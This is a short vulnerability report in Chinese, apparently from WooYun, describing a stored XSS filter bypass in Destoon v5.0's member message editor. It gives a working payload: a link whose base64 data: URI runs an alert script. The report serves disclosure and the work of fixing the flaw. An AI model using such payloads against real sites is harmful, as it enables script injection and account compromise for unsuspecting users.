### 简要描述:
destoon /v5.0/ 存储型xss 指哪打哪(绕过1)
### 详细说明:
上次发的 [WooYun: destoon /v5.0/ 存储型xss指哪打哪](http://www.wooyun.org/bugs/wooyun-2014-055638)
注册一个用户
http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa
回复处用了编辑器
编辑器有些标签没过滤,导致xss执行
xsscode:
```
<a href="data:text/html;charset=utf-8;base
64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Og=="> click</a>
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg" alt="22222222222222222222222222222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg)
[<img src="https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg" alt="222223333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg)
[<img src="https://images.seebug.org/upload/201405/162350459a6e0571f536d79e35e77f617999548f.jpg" alt="33333333333333333333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/162350459a6e0571f536d79e35e77f617999548f.jpg)
京公网安备 11010502034610号
暂无评论